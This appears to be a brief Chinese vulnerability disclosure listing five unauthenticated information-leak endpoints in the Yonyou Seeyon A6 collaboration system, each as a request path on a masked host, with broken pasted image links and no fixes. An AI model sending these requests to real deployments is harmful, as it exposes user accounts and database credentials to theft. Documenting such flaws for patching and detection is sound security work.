用友致远A6协同管理系统多处敏感信息泄露

Grav1ty

1、initDataAssess.jsp 用户敏感信息泄露漏洞
file:///C:\Users\SuperZJY\AppData\Roaming\Tencent\QQ\Temp\%W@GJ$ACOF(TYDYECOKVDYB.pnghttp://xx.xx.xx.xx/yyoa/assess/js/initDataAssess.jsp

2、reloadData.jsp 用户敏感信息泄露漏洞
file:///C:\Users\SuperZJY\AppData\Roaming\Tencent\QQ\Temp\%W@GJ$ACOF(TYDYECOKVDYB.pnghttp://xx.xx.xx.xx/yyoa/common/SelectPerson/reloadData.jsp
这里需要查看网页源码才能看到信息

3、config.jsp 敏感信息泄漏漏洞
file:///C:\Users\SuperZJY\AppData\Roaming\Tencent\QQ\Temp\%W@GJ$ACOF(TYDYECOKVDYB.pnghttp://xx.xx.xx.xx/yyoa/ext/trafaxserver/SystemManage/config.jsp

4、createMysql.jsp 数据库敏感信息泄露漏洞
file:///C:\Users\SuperZJY\AppData\Roaming\Tencent\QQ\Temp\%W@GJ$ACOF(TYDYECOKVDYB.pnghttp://xx.xx.xx.xx/yyoa/createMysql.jsp
file:///C:\Users\SuperZJY\AppData\Roaming\Tencent\QQ\Temp\%W@GJ$ACOF(TYDYECOKVDYB.pnghttp://xx.xx.xx.xx/yyoa/ext/createMysql.jsp

5、DownExcelBeanServlet 用户敏感信息泄露
file:///C:\Users\SuperZJY\AppData\Roaming\Tencent\QQ\Temp\%W@GJ$ACOF(TYDYECOKVDYB.pnghttp://xx.xx.xx.xx/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0